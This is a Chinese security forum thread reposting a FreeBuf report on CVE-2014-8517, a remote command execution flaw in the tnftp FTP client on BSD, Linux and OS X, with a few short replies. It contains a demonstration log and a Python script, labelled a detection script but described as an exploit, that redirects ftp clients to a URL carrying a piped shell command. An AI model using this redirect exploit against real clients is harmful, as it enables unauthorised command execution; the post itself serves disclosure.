查看: 15209|回复: 6

FTP曝严重远程执行漏洞,影响多个版本Linux(附检测脚本)

[复制链接]
  • TA的每日心情
    擦汗
    2016-10-21 09:51
  • 签到天数: 6 天

    [LV.2]偶尔看看I

    发表于 2014-10-30 11:23:14 | 显示全部楼层 |阅读模式
    本帖最后由 小安 于 2014-10-30 11:24 编辑

    10月28日,一份公开的邮件中曝出FTP远程执行命令漏洞,漏洞影响到的Linux系统包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影响到了苹果的OS X操作系统的最新版本Yosemite 10.10。

    NetBSD的一位开发人员(Jared McNeill)证实了这个漏洞可已通过tnftp让WEB服务器远程执行恶意命令,并且此漏洞已被编号为CVE-2014-8517 :

       
    [AppleScript] 纯文本查看 复制代码
     a20$ pwd
         /var/www/cgi-bin
         a20$ ls -l
         total 4
         -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
         -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
         a20$ cat redirect
         #!/bin/sh
         echo 'Status: 302 Found'
         echo 'Content-Type: text/html'
         echo 'Connection: keep-alive'
         echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
         echo
         a20$
       a20$ ftp http://localhost/cgi-bin/redirect
       Trying ::1:80 ...
       ftp: Can't connect to `::1:80': Connection refused
       Trying 127.0.0.1:80 ...
       Requesting http://localhost/cgi-bin/redirect
       Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
       Requesting http://192.168.2.19/cgi-bin/|uname%20-a
           32      101.46 KiB/s
       32 bytes retrieved in 00:00 (78.51 KiB/s)
       NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
       ADT 2014
       Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
       BOARD evbarm
       a20$

    漏洞影响范围及公告

    Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple等系统开发商已经意识到了此漏洞的危害,其中Debian, Red Hat, Gnetoo and Novell已经发出了漏洞公告:


    漏洞检测脚本(请勿用于非法用途)

    [AppleScript] 纯文本查看 复制代码
    #!/usr/bin/env python
    
    """
    Sample OSX/BSD FTP client exploit. Written because ISO policies were doing
    my head in. To exploit, edit the value of the cmd variable, then run the
    script. To test:
    
    	ftp http://<myserver>/foo
    
    And you should see the command executed.
    
    All wrongs reversed - @stevelord
    """
    
    import Basehttperver
    import sys
    import socket
    import urllib
    
    hostname = socket.getfqdn() # Set this to your IP if you have no FQDN
    port = 8000 # Set this to the port you want to run this on
    cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying."
    
    cmd = urllib.quote(cmd)
    redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd 
    
    class RedirectHandler(Basehttperver.BaseHTTPRequestHandler):
    	def do_GET(s):
    		if cmd in s.path:
    			s.send_response(200)
    			s.end_headers()
    		else:
    			s.send_response(302)
    			s.send_header("Location", redir)
    			s.end_headers()
    
    if __name__ == "__main__":
    	print "redirecting to,", redir
    	server_class = Basehttperver.httperver
    	httpd = server_class((hostname, port), RedirectHandler)
    	try:
    		httpd.serve_forever()
    		print "Started serving."
    	except KeyboardInterrupt:
    		pass
    	httpd.server_close()
    	print "\nStopped serving."

    解决方案和更详细的内容参见:

    http://seclists.org/oss-sec/2014/q4/459 http://seclists.org/oss-sec/2014/q4/464

    http://seclists.org/oss-sec/2014/q4/460

    转载自 FreeBuf.com


    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-10-30 18:51:38 | 显示全部楼层
    - - 真是 不安全啊。。。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-10-30 22:02:33 | 显示全部楼层
    最近好多。。。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-8-21 09:22
  • 签到天数: 181 天

    [LV.7]常住居民III

    发表于 2014-10-31 13:54:49 | 显示全部楼层
    最近是漏洞大批露啊
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-9-21 14:45
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2014-10-31 21:37:39 | 显示全部楼层
    又是远程命令执行
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-8-14 20:30
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2014-11-1 12:25:37 | 显示全部楼层
    Freebuf越来越吊了。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2024-7-29 21:03
  • 签到天数: 657 天

    [LV.9]以坛为家II

    发表于 2014-11-3 00:24:32 | 显示全部楼层
    什么都不安去
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-22 11:16 , Processed in 0.035625 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部